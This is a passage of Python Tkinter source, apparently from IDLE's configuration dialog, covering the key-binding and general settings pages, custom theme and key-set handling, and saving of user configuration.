theme_type_title.pack(side=TOP, anchor=W, padx=5, pady=5)
self.radio_theme_builtin.pack(side=TOP, anchor=W, padx=5)
self.radio_theme_custom.pack(side=TOP, anchor=W, padx=5, pady=2)
self.opt_menu_theme_builtin.pack(side=TOP, fill=X, padx=5, pady=5)
self.opt_menu_theme_custom.pack(side=TOP, fill=X, anchor=W, padx=5, pady=5)
self.button_delete_custom_theme.pack(side=TOP, fill=X, padx=5, pady=5)
self.new_custom_theme.pack(side=TOP, fill=X, pady=5)
return frame
def create_page_keys(self):
parent = self.parent
self.binding_target = StringVar(parent)
self.builtin_keys = StringVar(parent)
self.custom_keys = StringVar(parent)
self.are_keys_builtin = BooleanVar(parent)
self.keybinding = StringVar(parent)
##widget creation
#body frame
frame = self.tab_pages.pages['Keys'].frame
#body section frames
frame_custom = LabelFrame(
frame, borderwidth=2, relief=GROOVE,
text=' Custom Key Bindings ')
frame_key_sets = LabelFrame(
frame, borderwidth=2, relief=GROOVE, text=' Key Set ')
#frame_custom
frame_target = Frame(frame_custom)
target_title = Label(frame_target, text='Action - Key(s)')
scroll_target_y = Scrollbar(frame_target)
scroll_target_x = Scrollbar(frame_target, orient=HORIZONTAL)
self.list_bindings = Listbox(
frame_target, takefocus=FALSE, exportselection=FALSE)
self.list_bindings.bind('<ButtonRelease-1>', self.keybinding_selected)
scroll_target_y.config(command=self.list_bindings.yview)
scroll_target_x.config(command=self.list_bindings.xview)
self.list_bindings.config(yscrollcommand=scroll_target_y.set)
self.list_bindings.config(xscrollcommand=scroll_target_x.set)
self.button_new_keys = Button(
frame_custom, text='Get New Keys for Selection',
command=self.get_new_keys, state=DISABLED)
#frame_key_sets
frames = [Frame(frame_key_sets, padx=2, pady=2, borderwidth=0)
for i in range(2)]
self.radio_keys_builtin = Radiobutton(
frames[0], variable=self.are_keys_builtin, value=1,
command=self.set_keys_type, text='Use a Built-in Key Set')
self.radio_keys_custom = Radiobutton(
frames[0], variable=self.are_keys_builtin, value=0,
command=self.set_keys_type, text='Use a Custom Key Set')
self.opt_menu_keys_builtin = DynOptionMenu(
frames[0], self.builtin_keys, None, command=None)
self.opt_menu_keys_custom = DynOptionMenu(
frames[0], self.custom_keys, None, command=None)
self.button_delete_custom_keys = Button(
frames[1], text='Delete Custom Key Set',
command=self.delete_custom_keys)
button_save_custom_keys = Button(
frames[1], text='Save as New Custom Key Set',
command=self.save_as_new_key_set)
self.new_custom_keys = Label(frames[0], bd=2)
##widget packing
#body
frame_custom.pack(side=BOTTOM, padx=5, pady=5, expand=TRUE, fill=BOTH)
frame_key_sets.pack(side=BOTTOM, padx=5, pady=5, fill=BOTH)
#frame_custom
self.button_new_keys.pack(side=BOTTOM, fill=X, padx=5, pady=5)
frame_target.pack(side=LEFT, padx=5, pady=5, expand=TRUE, fill=BOTH)
#frame target
frame_target.columnconfigure(0, weight=1)
frame_target.rowconfigure(1, weight=1)
target_title.grid(row=0, column=0, columnspan=2, sticky=W)
self.list_bindings.grid(row=1, column=0, sticky=NSEW)
scroll_target_y.grid(row=1, column=1, sticky=NS)
scroll_target_x.grid(row=2, column=0, sticky=EW)
#frame_key_sets
self.radio_keys_builtin.grid(row=0, column=0, sticky=W+NS)
self.radio_keys_custom.grid(row=1, column=0, sticky=W+NS)
self.opt_menu_keys_builtin.grid(row=0, column=1, sticky=NSEW)
self.opt_menu_keys_custom.grid(row=1, column=1, sticky=NSEW)
self.new_custom_keys.grid(row=0, column=2, sticky=NSEW, padx=5, pady=5)
self.button_delete_custom_keys.pack(side=LEFT, fill=X, expand=True, padx=2)
button_save_custom_keys.pack(side=LEFT, fill=X, expand=True, padx=2)
frames[0].pack(side=TOP, fill=BOTH, expand=True)
frames[1].pack(side=TOP, fill=X, expand=True, pady=2)
return frame
def create_page_general(self):
parent = self.parent
self.win_width = StringVar(parent)
self.win_height = StringVar(parent)
self.startup_edit = IntVar(parent)
self.autosave = IntVar(parent)
self.encoding = StringVar(parent)
self.user_help_browser = BooleanVar(parent)
self.help_browser = StringVar(parent)
#widget creation
#body
frame = self.tab_pages.pages['General'].frame
#body section frames
frame_run = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' Startup Preferences ')
frame_save = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' autosave Preferences ')
frame_win_size = Frame(frame, borderwidth=2, relief=GROOVE)
frame_help = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' Additional Help Sources ')
#frame_run
startup_title = Label(frame_run, text='At Startup')
self.radio_startup_edit = Radiobutton(
frame_run, variable=self.startup_edit, value=1,
text="Open Edit Window")
self.radio_startup_shell = Radiobutton(
frame_run, variable=self.startup_edit, value=0,
text='Open Shell Window')
#frame_save
run_save_title = Label(frame_save, text='At Start of Run (F5) ')
self.radio_save_ask = Radiobutton(
frame_save, variable=self.autosave, value=0,
text="Prompt to Save")
self.radio_save_auto = Radiobutton(
frame_save, variable=self.autosave, value=1,
text='No Prompt')
#frame_win_size
win_size_title = Label(
frame_win_size, text='Initial Window Size (in characters)')
win_width_title = Label(frame_win_size, text='Width')
self.entry_win_width = Entry(
frame_win_size, textvariable=self.win_width, width=3)
win_height_title = Label(frame_win_size, text='Height')
self.entry_win_height = Entry(
frame_win_size, textvariable=self.win_height, width=3)
#frame_help
frame_helplist = Frame(frame_help)
frame_helplist_buttons = Frame(frame_helplist)
scroll_helplist = Scrollbar(frame_helplist)
self.list_help = Listbox(
frame_helplist, height=5, takefocus=FALSE,
exportselection=FALSE)
scroll_helplist.config(command=self.list_help.yview)
self.list_help.config(yscrollcommand=scroll_helplist.set)
self.list_help.bind('<ButtonRelease-1>', self.help_source_selected)
self.button_helplist_edit = Button(
frame_helplist_buttons, text='Edit', state=DISABLED,
width=8, command=self.helplist_item_edit)
self.button_helplist_add = Button(
frame_helplist_buttons, text='Add',
width=8, command=self.helplist_item_add)
self.button_helplist_remove = Button(
frame_helplist_buttons, text='Remove', state=DISABLED,
width=8, command=self.helplist_item_remove)
#widget packing
#body
frame_run.pack(side=TOP, padx=5, pady=5, fill=X)
frame_save.pack(side=TOP, padx=5, pady=5, fill=X)
frame_win_size.pack(side=TOP, padx=5, pady=5, fill=X)
frame_help.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
#frame_run
startup_title.pack(side=LEFT, anchor=W, padx=5, pady=5)
self.radio_startup_shell.pack(side=RIGHT, anchor=W, padx=5, pady=5)
self.radio_startup_edit.pack(side=RIGHT, anchor=W, padx=5, pady=5)
#frame_save
run_save_title.pack(side=LEFT, anchor=W, padx=5, pady=5)
self.radio_save_auto.pack(side=RIGHT, anchor=W, padx=5, pady=5)
self.radio_save_ask.pack(side=RIGHT, anchor=W, padx=5, pady=5)
#frame_win_size
win_size_title.pack(side=LEFT, anchor=W, padx=5, pady=5)
self.entry_win_height.pack(side=RIGHT, anchor=E, padx=10, pady=5)
win_height_title.pack(side=RIGHT, anchor=E, pady=5)
self.entry_win_width.pack(side=RIGHT, anchor=E, padx=10, pady=5)
win_width_title.pack(side=RIGHT, anchor=E, pady=5)
#frame_help
frame_helplist_buttons.pack(side=RIGHT, padx=5, pady=5, fill=Y)
frame_helplist.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
scroll_helplist.pack(side=RIGHT, anchor=W, fill=Y)
self.list_help.pack(side=LEFT, anchor=E, expand=TRUE, fill=BOTH)
self.button_helplist_edit.pack(side=TOP, anchor=W, pady=5)
self.button_helplist_add.pack(side=TOP, anchor=W)
self.button_helplist_remove.pack(side=TOP, anchor=W, pady=5)
return frame
def attach_var_callbacks(self):
self.font_size.trace_add('write', self.var_changed_font)
self.font_name.trace_add('write', self.var_changed_font)
self.font_bold.trace_add('write', self.var_changed_font)
self.space_num.trace_add('write', self.var_changed_space_num)
self.colour.trace_add('write', self.var_changed_colour)
self.builtin_theme.trace_add('write', self.var_changed_builtin_theme)
self.custom_theme.trace_add('write', self.var_changed_custom_theme)
self.is_builtin_theme.trace_add('write', self.var_changed_is_builtin_theme)
self.highlight_target.trace_add('write', self.var_changed_highlight_target)
self.keybinding.trace_add('write', self.var_changed_keybinding)
self.builtin_keys.trace_add('write', self.var_changed_builtin_keys)
self.custom_keys.trace_add('write', self.var_changed_custom_keys)
self.are_keys_builtin.trace_add('write', self.var_changed_are_keys_builtin)
self.win_width.trace_add('write', self.var_changed_win_width)
self.win_height.trace_add('write', self.var_changed_win_height)
self.startup_edit.trace_add('write', self.var_changed_startup_edit)
self.autosave.trace_add('write', self.var_changed_autosave)
self.encoding.trace_add('write', self.var_changed_encoding)
def remove_var_callbacks(self):
"Remove callbacks to prevent memory leaks."
for var in (
self.font_size, self.font_name, self.font_bold,
self.space_num, self.colour, self.builtin_theme,
self.custom_theme, self.is_builtin_theme, self.highlight_target,
self.keybinding, self.builtin_keys, self.custom_keys,
self.are_keys_builtin, self.win_width, self.win_height,
self.startup_edit, self.autosave, self.encoding,):
var.trace_remove('write', var.trace_info()[0][1])
def var_changed_font(self, *params):
'''When one font attribute changes, save them all, as they are
not independent from each other. In particular, when we are
overriding the default font, we need to write out everything.
'''
value = self.font_name.get()
self.add_changed_item('main', 'EditorWindow', 'font', value)
value = self.font_size.get()
self.add_changed_item('main', 'EditorWindow', 'font-size', value)
value = self.font_bold.get()
self.add_changed_item('main', 'EditorWindow', 'font-bold', value)
def var_changed_space_num(self, *params):
value = self.space_num.get()
self.add_changed_item('main', 'Indent', 'num-spaces', value)
def var_changed_colour(self, *params):
self.on_new_colour_set()
def var_changed_builtin_theme(self, *params):
old_themes = ('IDLE Classic', 'IDLE New')
value = self.builtin_theme.get()
if value not in old_themes:
if idleConf.GetOption('main', 'Theme', 'name') not in old_themes:
self.add_changed_item('main', 'Theme', 'name', old_themes[0])
self.add_changed_item('main', 'Theme', 'name2', value)
self.new_custom_theme.config(text='New theme, see Help',
fg='#500000')
else:
self.add_changed_item('main', 'Theme', 'name', value)
self.add_changed_item('main', 'Theme', 'name2', '')
self.new_custom_theme.config(text='', fg='black')
self.paint_theme_sample()
def var_changed_custom_theme(self, *params):
value = self.custom_theme.get()
if value != '- no custom themes -':
self.add_changed_item('main', 'Theme', 'name', value)
self.paint_theme_sample()
def var_changed_is_builtin_theme(self, *params):
value = self.is_builtin_theme.get()
self.add_changed_item('main', 'Theme', 'default', value)
if value:
self.var_changed_builtin_theme()
else:
self.var_changed_custom_theme()
def var_changed_highlight_target(self, *params):
self.set_highlight_target()
def var_changed_keybinding(self, *params):
value = self.keybinding.get()
key_set = self.custom_keys.get()
event = self.list_bindings.get(ANCHOR).split()[0]
if idleConf.IsCoreBinding(event):
#this is a core keybinding
self.add_changed_item('keys', key_set, event, value)
else: #this is an extension key binding
ext_name = idleConf.GetExtnNameForEvent(event)
ext_keybind_section = ext_name + '_cfgBindings'
self.add_changed_item('extensions', ext_keybind_section, event, value)
def var_changed_builtin_keys(self, *params):
old_keys = (
'IDLE Classic Windows',
'IDLE Classic Unix',
'IDLE Classic Mac',
'IDLE Classic OSX',
)
value = self.builtin_keys.get()
if value not in old_keys:
if idleConf.GetOption('main', 'Keys', 'name') not in old_keys:
self.add_changed_item('main', 'Keys', 'name', old_keys[0])
self.add_changed_item('main', 'Keys', 'name2', value)
self.new_custom_keys.config(text='New key set, see Help',
fg='#500000')
else:
self.add_changed_item('main', 'Keys', 'name', value)
self.add_changed_item('main', 'Keys', 'name2', '')
self.new_custom_keys.config(text='', fg='black')
self.load_keys_list(value)
def var_changed_custom_keys(self, *params):
value = self.custom_keys.get()
if value != '- no custom keys -':
self.add_changed_item('main', 'Keys', 'name', value)
self.load_keys_list(value)
def var_changed_are_keys_builtin(self, *params):
value = self.are_keys_builtin.get()
self.add_changed_item('main', 'Keys', 'default', value)
if value:
self.var_changed_builtin_keys()
else:
self.var_changed_custom_keys()
def var_changed_win_width(self, *params):
value = self.win_width.get()
self.add_changed_item('main', 'EditorWindow', 'width', value)
def var_changed_win_height(self, *params):
value = self.win_height.get()
self.add_changed_item('main', 'EditorWindow', 'height', value)
def var_changed_startup_edit(self, *params):
value = self.startup_edit.get()
self.add_changed_item('main', 'General', 'editor-on-startup', value)
def var_changed_autosave(self, *params):
value = self.autosave.get()
self.add_changed_item('main', 'General', 'autosave', value)
def var_changed_encoding(self, *params):
value = self.encoding.get()
self.add_changed_item('main', 'EditorWindow', 'encoding', value)
def reset_changed_items(self):
#When any config item is changed in this dialog, an entry
#should be made in the relevant section (config type) of this
#dictionary. The key should be the config file section name and the
#value a dictionary, whose key:value pairs are item=value pairs for
#that config file section.
self.changed_items = {'main':{}, 'highlight':{}, 'keys':{},
'extensions':{}}
def add_changed_item(self, typ, section, item, value):
value = str(value) #make sure we use a string
if section not in self.changed_items[typ]:
self.changed_items[typ][section] = {}
self.changed_items[typ][section][item] = value
def GetDefaultItems(self):
d_items={'main':{}, 'highlight':{}, 'keys':{}, 'extensions':{}}
for config_type in d_items:
sections = idleConf.GetSectionList('default', config_type)
for section in sections:
d_items[config_type][section] = {}
options = idleConf.defaultCfg[config_type].GetOptionList(section)
for option in options:
d_items[config_type][section][option] = (
idleConf.defaultCfg[config_type].Get(section, option))
return d_items
def set_theme_type(self):
if self.is_builtin_theme.get():
self.opt_menu_theme_builtin.config(state=NORMAL)
self.opt_menu_theme_custom.config(state=DISABLED)
self.button_delete_custom_theme.config(state=DISABLED)
else:
self.opt_menu_theme_builtin.config(state=DISABLED)
self.radio_theme_custom.config(state=NORMAL)
self.opt_menu_theme_custom.config(state=NORMAL)
self.button_delete_custom_theme.config(state=NORMAL)
def set_keys_type(self):
if self.are_keys_builtin.get():
self.opt_menu_keys_builtin.config(state=NORMAL)
self.opt_menu_keys_custom.config(state=DISABLED)
self.button_delete_custom_keys.config(state=DISABLED)
else:
self.opt_menu_keys_builtin.config(state=DISABLED)
self.radio_keys_custom.config(state=NORMAL)
self.opt_menu_keys_custom.config(state=NORMAL)
self.button_delete_custom_keys.config(state=NORMAL)
def get_new_keys(self):
list_index = self.list_bindings.index(ANCHOR)
binding = self.list_bindings.get(list_index)
bind_name = binding.split()[0] #first part, up to first space
if self.are_keys_builtin.get():
current_key_set_name = self.builtin_keys.get()
else:
current_key_set_name = self.custom_keys.get()
current_bindings = idleConf.GetCurrentKeySet()
if current_key_set_name in self.changed_items['keys']: #unsaved changes
key_set_changes = self.changed_items['keys'][current_key_set_name]
for event in key_set_changes:
current_bindings[event] = key_set_changes[event].split()
current_key_sequences = list(current_bindings.values())
new_keys = GetKeysDialog(self, 'Get New Keys', bind_name,
current_key_sequences).result
if new_keys: #new keys were specified
if self.are_keys_builtin.get(): #current key set is a built-in
message = ('Your changes will be saved as a new Custom Key Set.'
' Enter a name for your new Custom Key Set below.')
new_keyset = self.get_new_keys_name(message)
if not new_keyset: #user cancelled custom key set creation
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
return
else: #create new custom key set based on previously active key set
self.create_new_key_set(new_keyset)
self.list_bindings.delete(list_index)
self.list_bindings.insert(list_index, bind_name+' - '+new_keys)
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
self.keybinding.set(new_keys)
else:
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
def get_new_keys_name(self, message):
used_names = (idleConf.GetSectionList('user', 'keys') +
idleConf.GetSectionList('default', 'keys'))
new_keyset = SectionName(
self, 'New Custom Key Set', message, used_names).result
return new_keyset
def save_as_new_key_set(self):
new_keys_name = self.get_new_keys_name('New Key Set Name:')
if new_keys_name:
self.create_new_key_set(new_keys_name)
def keybinding_selected(self, event):
self.button_new_keys.config(state=NORMAL)
def create_new_key_set(self, new_key_set_name):
#creates new custom key set based on the previously active key set,
#and makes the new key set active
if self.are_keys_builtin.get():
prev_key_set_name = self.builtin_keys.get()
else:
prev_key_set_name = self.custom_keys.get()
prev_keys = idleConf.GetCoreKeys(prev_key_set_name)
new_keys = {}
for event in prev_keys: #add key set to changed items
event_name = event[2:-2] #trim off the angle brackets
binding = ' '.join(prev_keys[event])
new_keys[event_name] = binding
#handle any unsaved changes to prev key set
if prev_key_set_name in self.changed_items['keys']:
key_set_changes = self.changed_items['keys'][prev_key_set_name]
for event in key_set_changes:
new_keys[event] = key_set_changes[event]
#save the new theme
self.save_new_key_set(new_key_set_name, new_keys)
#change gui over to the new key set
custom_key_list = idleConf.GetSectionList('user', 'keys')
custom_key_list.sort()
self.opt_menu_keys_custom.SetMenu(custom_key_list, new_key_set_name)
self.are_keys_builtin.set(0)
self.set_keys_type()
def load_keys_list(self, keyset_name):
reselect = 0
new_keyset = 0
if self.list_bindings.curselection():
reselect = 1
list_index = self.list_bindings.index(ANCHOR)
keyset = idleConf.GetKeySet(keyset_name)
bind_names = list(keyset.keys())
bind_names.sort()
self.list_bindings.delete(0, END)
for bind_name in bind_names:
key = ' '.join(keyset[bind_name]) #make key(s) into a string
bind_name = bind_name[2:-2] #trim off the angle brackets
if keyset_name in self.changed_items['keys']:
#handle any unsaved changes to this key set
if bind_name in self.changed_items['keys'][keyset_name]:
key = self.changed_items['keys'][keyset_name][bind_name]
self.list_bindings.insert(END, bind_name+' - '+key)
if reselect:
self.list_bindings.see(list_index)
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
def delete_custom_keys(self):
keyset_name=self.custom_keys.get()
delmsg = 'Are you sure you wish to delete the key set %r ?'
if not tkMessageBox.askyesno(
'Delete Key Set', delmsg % keyset_name, parent=self):
return
self.deactivate_current_config()
#remove key set from config
idleConf.userCfg['keys'].remove_section(keyset_name)
if keyset_name in self.changed_items['keys']:
del(self.changed_items['keys'][keyset_name])
#write changes
idleConf.userCfg['keys'].Save()
#reload user key set list
item_list = idleConf.GetSectionList('user', 'keys')
item_list.sort()
if not item_list:
self.radio_keys_custom.config(state=DISABLED)
self.opt_menu_keys_custom.SetMenu(item_list, '- no custom keys -')
else:
self.opt_menu_keys_custom.SetMenu(item_list, item_list[0])
#revert to default key set
self.are_keys_builtin.set(idleConf.defaultCfg['main']
.Get('Keys', 'default'))
self.builtin_keys.set(idleConf.defaultCfg['main'].Get('Keys', 'name')
or idleConf.default_keys())
#user can't back out of these changes, they must be applied now
self.save_all_changed_configs()
self.activate_config_changes()
self.set_keys_type()
def delete_custom_theme(self):
theme_name = self.custom_theme.get()
delmsg = 'Are you sure you wish to delete the theme %r ?'
if not tkMessageBox.askyesno(
'Delete Theme', delmsg % theme_name, parent=self):
return
self.deactivate_current_config()
#remove theme from config
idleConf.userCfg['highlight'].remove_section(theme_name)
if theme_name in self.changed_items['highlight']:
del(self.changed_items['highlight'][theme_name])
#write changes
idleConf.userCfg['highlight'].Save()
#reload user theme list
item_list = idleConf.GetSectionList('user', 'highlight')
item_list.sort()
if not item_list:
self.radio_theme_custom.config(state=DISABLED)
self.opt_menu_theme_custom.SetMenu(item_list, '- no custom themes -')
else:
self.opt_menu_theme_custom.SetMenu(item_list, item_list[0])
#revert to default theme
self.is_builtin_theme.set(idleConf.defaultCfg['main'].Get('Theme', 'default'))
self.builtin_theme.set(idleConf.defaultCfg['main'].Get('Theme', 'name'))
#user can't back out of these changes, they must be applied now
self.save_all_changed_configs()
self.activate_config_changes()
self.set_theme_type()
def get_colour(self):
target = self.highlight_target.get()
prev_colour = self.frame_colour_set.cget('bg')
rgbTuplet, colour_string = tkColorChooser.askcolor(
parent=self, title='Pick new colour for : '+target,
initialcolor=prev_colour)
if colour_string and (colour_string != prev_colour):
#user didn't cancel, and they chose a new colour
if self.is_builtin_theme.get(): #current theme is a built-in
message = ('Your changes will be saved as a new Custom Theme. '
'Enter a name for your new Custom Theme below.')
new_theme = self.get_new_theme_name(message)
if not new_theme: #user cancelled custom theme creation
return
else: #create new custom theme based on previously active theme
self.create_new_theme(new_theme)
self.colour.set(colour_string)
else: #current theme is user defined
self.colour.set(colour_string)
def on_new_colour_set(self):
new_colour=self.colour.get()
self.frame_colour_set.config(bg=new_colour) #set sample
plane ='foreground' if self.fg_bg_toggle.get() else 'background'
sample_element = self.theme_elements[self.highlight_target.get()][0]
self.text_highlight_sample.tag_config(sample_element, **{plane:new_colour})
theme = self.custom_theme.get()
theme_element = sample_element + '-' + plane
self.add_changed_item('highlight', theme, theme_element, new_colour)
def get_new_theme_name(self, message):
used_names = (idleConf.GetSectionList('user', 'highlight') +
idleConf.GetSectionList('default', 'highlight'))
new_theme = SectionName(
self, 'New Custom Theme', message, used_names).result
return new_theme
def save_as_new_theme(self):
new_theme_name = self.get_new_theme_name('New Theme Name:')
if new_theme_name:
self.create_new_theme(new_theme_name)
def create_new_theme(self, new_theme_name):
#creates new custom theme based on the previously active theme,
#and makes the new theme active
if self.is_builtin_theme.get():
theme_type = 'default'
theme_name = self.builtin_theme.get()
else:
theme_type = 'user'
theme_name = self.custom_theme.get()
new_theme = idleConf.GetThemeDict(theme_type, theme_name)
#apply any of the old theme's unsaved changes to the new theme
if theme_name in self.changed_items['highlight']:
theme_changes = self.changed_items['highlight'][theme_name]
for element in theme_changes:
new_theme[element] = theme_changes[element]
#save the new theme
self.save_new_theme(new_theme_name, new_theme)
#change gui over to the new theme
custom_theme_list = idleConf.GetSectionList('user', 'highlight')
custom_theme_list.sort()
self.opt_menu_theme_custom.SetMenu(custom_theme_list, new_theme_name)
self.is_builtin_theme.set(0)
self.set_theme_type()
def on_list_fonts_button_release(self, event):
font = self.list_fonts.get(ANCHOR)
self.font_name.set(font.lower())
self.set_font_sample()
def set_font_sample(self, event=None):
font_name = self.font_name.get()
font_weight = tkFont.BOLD if self.font_bold.get() else tkFont.NORMAL
new_font = (font_name, self.font_size.get(), font_weight)
self.font_sample.config(font=new_font)
self.text_highlight_sample.configure(font=new_font)
def set_highlight_target(self):
if self.highlight_target.get() == 'Cursor': #bg not possible
self.radio_fg.config(state=DISABLED)
self.radio_bg.config(state=DISABLED)
self.fg_bg_toggle.set(1)
else: #both fg and bg can be set
self.radio_fg.config(state=NORMAL)
self.radio_bg.config(state=NORMAL)
self.fg_bg_toggle.set(1)
self.set_colour_sample()
def set_colour_sample_binding(self, *args):
self.set_colour_sample()
def set_colour_sample(self):
#set the colour smaple area
tag = self.theme_elements[self.highlight_target.get()][0]
plane = 'foreground' if self.fg_bg_toggle.get() else 'background'
colour = self.text_highlight_sample.tag_cget(tag, plane)
self.frame_colour_set.config(bg=colour)
def paint_theme_sample(self):
if self.is_builtin_theme.get(): #a default theme
theme = self.builtin_theme.get()
else: #a user theme
theme = self.custom_theme.get()
for element_title in self.theme_elements:
element = self.theme_elements[element_title][0]
colours = idleConf.GetHighlight(theme, element)
if element == 'cursor': #cursor sample needs special painting
colours['background'] = idleConf.GetHighlight(
theme, 'normal', fgBg='bg')
#handle any unsaved changes to this theme
if theme in self.changed_items['highlight']:
theme_dict = self.changed_items['highlight'][theme]
if element + '-foreground' in theme_dict:
colours['foreground'] = theme_dict[element + '-foreground']
if element + '-background' in theme_dict:
colours['background'] = theme_dict[element + '-background']
self.text_highlight_sample.tag_config(element, **colours)
self.set_colour_sample()
def help_source_selected(self, event):
self.set_helplist_button_states()
def set_helplist_button_states(self):
if self.list_help.size() < 1: #no entries in list
self.button_helplist_edit.config(state=DISABLED)
self.button_helplist_remove.config(state=DISABLED)
else: #there are some entries
if self.list_help.curselection(): #there currently is a selection
self.button_helplist_edit.config(state=NORMAL)
self.button_helplist_remove.config(state=NORMAL)
else: #there currently is not a selection
self.button_helplist_edit.config(state=DISABLED)
self.button_helplist_remove.config(state=DISABLED)
def helplist_item_add(self):
help_source = HelpSource(self, 'New Help Source',
).result
if help_source:
self.user_helplist.append((help_source[0], help_source[1]))
self.list_help.insert(END, help_source[0])
self.update_user_help_changed_items()
self.set_helplist_button_states()
def helplist_item_edit(self):
item_index = self.list_help.index(ANCHOR)
help_source = self.user_helplist[item_index]
new_help_source = HelpSource(
self, 'Edit Help Source',
menuitem=help_source[0],
filepath=help_source[1],
).result
if new_help_source and new_help_source != help_source:
self.user_helplist[item_index] = new_help_source
self.list_help.delete(item_index)
self.list_help.insert(item_index, new_help_source[0])
self.update_user_help_changed_items()
self.set_helplist_button_states()
def helplist_item_remove(self):
item_index = self.list_help.index(ANCHOR)
del(self.user_helplist[item_index])
self.list_help.delete(item_index)
self.update_user_help_changed_items()
self.set_helplist_button_states()
def update_user_help_changed_items(self):
"Clear and rebuild the HelpFiles section in self.changed_items"
self.changed_items['main']['HelpFiles'] = {}
for num in range(1, len(self.user_helplist) + 1):
self.add_changed_item(
'main', 'HelpFiles', str(num),
';'.join(self.user_helplist[num-1][:2]))
def load_font_cfg(self):
##base editor font selection list
fonts = list(tkFont.families(self))
fonts.sort()
for font in fonts:
self.list_fonts.insert(END, font)
configured_font = idleConf.GetFont(self, 'main', 'EditorWindow')
font_name = configured_font[0].lower()
font_size = configured_font[1]
font_bold = configured_font[2]=='bold'
self.font_name.set(font_name)
lc_fonts = [s.lower() for s in fonts]
try:
current_font_index = lc_fonts.index(font_name)
self.list_fonts.see(current_font_index)
self.list_fonts.select_set(current_font_index)
self.list_fonts.select_anchor(current_font_index)
except ValueError:
pass
##font size dropdown
self.opt_menu_font_size.SetMenu(('7', '8', '9', '10', '11', '12', '13',
'14', '16', '18', '20', '22',
'25', '29', '34', '40'), font_size )
##font_weight
self.font_bold.set(font_bold)
##font sample
self.set_font_sample()
def load_tab_cfg(self):
##indent sizes
space_num = idleConf.GetOption(
'main', 'Indent', 'num-spaces', default=4, type='int')
self.space_num.set(space_num)
def load_theme_cfg(self):
##current theme type radiobutton
self.is_builtin_theme.set(idleConf.GetOption(
'main', 'Theme', 'default', type='bool', default=1))
##currently set theme
current_option = idleConf.CurrentTheme()
##load available theme option menus
if self.is_builtin_theme.get(): #default theme selected
item_list = idleConf.GetSectionList('default', 'highlight')
item_list.sort()
self.opt_menu_theme_builtin.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('user', 'highlight')
item_list.sort()
if not item_list:
self.radio_theme_custom.config(state=DISABLED)
self.custom_theme.set('- no custom themes -')
else:
self.opt_menu_theme_custom.SetMenu(item_list, item_list[0])
else: #user theme selected
item_list = idleConf.GetSectionList('user', 'highlight')
item_list.sort()
self.opt_menu_theme_custom.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('default', 'highlight')
item_list.sort()
self.opt_menu_theme_builtin.SetMenu(item_list, item_list[0])
self.set_theme_type()
##load theme element option menu
theme_names = list(self.theme_elements.keys())
theme_names.sort(key=lambda x: self.theme_elements[x][1])
self.opt_menu_highlight_target.SetMenu(theme_names, theme_names[0])
self.paint_theme_sample()
self.set_highlight_target()
def load_key_cfg(self):
##current keys type radiobutton
self.are_keys_builtin.set(idleConf.GetOption(
'main', 'Keys', 'default', type='bool', default=1))
##currently set keys
current_option = idleConf.CurrentKeys()
##load available keyset option menus
if self.are_keys_builtin.get(): #default theme selected
item_list = idleConf.GetSectionList('default', 'keys')
item_list.sort()
self.opt_menu_keys_builtin.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('user', 'keys')
item_list.sort()
if not item_list:
self.radio_keys_custom.config(state=DISABLED)
self.custom_keys.set('- no custom keys -')
else:
self.opt_menu_keys_custom.SetMenu(item_list, item_list[0])
else: #user key set selected
item_list = idleConf.GetSectionList('user', 'keys')
item_list.sort()
self.opt_menu_keys_custom.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('default', 'keys')
item_list.sort()
self.opt_menu_keys_builtin.SetMenu(item_list, idleConf.default_keys())
self.set_keys_type()
##load keyset element list
keyset_name = idleConf.CurrentKeys()
self.load_keys_list(keyset_name)
def load_general_cfg(self):
#startup state
self.startup_edit.set(idleConf.GetOption(
'main', 'General', 'editor-on-startup', default=1, type='bool'))
#autosave state
self.autosave.set(idleConf.GetOption(
'main', 'General', 'autosave', default=0, type='bool'))
#initial window size
self.win_width.set(idleConf.GetOption(
'main', 'EditorWindow', 'width', type='int'))
self.win_height.set(idleConf.GetOption(
'main', 'EditorWindow', 'height', type='int'))
# default source encoding
self.encoding.set(idleConf.GetOption(
'main', 'EditorWindow', 'encoding', default='none'))
# additional help sources
self.user_helplist = idleConf.GetAllExtraHelpSourcesList()
for help_item in self.user_helplist:
self.list_help.insert(END, help_item[0])
self.set_helplist_button_states()
def load_configs(self):
"""
load configuration from default and user config files and populate
the widgets on the config dialog pages.
"""
### fonts / tabs page
self.load_font_cfg()
self.load_tab_cfg()
### highlighting page
self.load_theme_cfg()
### keys page
self.load_key_cfg()
### general page
self.load_general_cfg()
# note: extension page handled separately
def save_new_key_set(self, keyset_name, keyset):
"""
save a newly created core key set.
keyset_name - string, the name of the new key set
keyset - dictionary containing the new key set
"""
if not idleConf.userCfg['keys'].has_section(keyset_name):
idleConf.userCfg['keys'].add_section(keyset_name)
for event in keyset:
value = keyset[event]
idleConf.userCfg['keys'].SetOption(keyset_name, event, value)
def save_new_theme(self, theme_name, theme):
"""
save a newly created theme.
theme_name - string, the name of the new theme
theme - dictionary containing the new theme
"""
if not idleConf.userCfg['highlight'].has_section(theme_name):
idleConf.userCfg['highlight'].add_section(theme_name)
for element in theme:
value = theme[element]
idleConf.userCfg['highlight'].SetOption(theme_name, element, value)
def set_user_value(self, config_type, section, item, value):
if idleConf.defaultCfg[config_type].has_option(section, item):
if idleConf.defaultCfg[config_type].Get(section, item) == value:
#the setting equals a default setting, remove it from user cfg
return idleConf.userCfg[config_type].RemoveOption(section, item)
#if we got here set the option
return idleConf.userCfg[config_type].SetOption(section, item, value)
def save_all_changed_configs(self):
"Save configuration changes to the user config file."
idleConf.userCfg['main'].Save()
for config_type in self.changed_items:
cfg_type_changed = False
for section in self.changed_items[config_type]:
if section == 'HelpFiles':
#this section gets completely replaced
idleConf.userCfg['main'].remove_section('HelpFiles')
cfg_type_changed = True
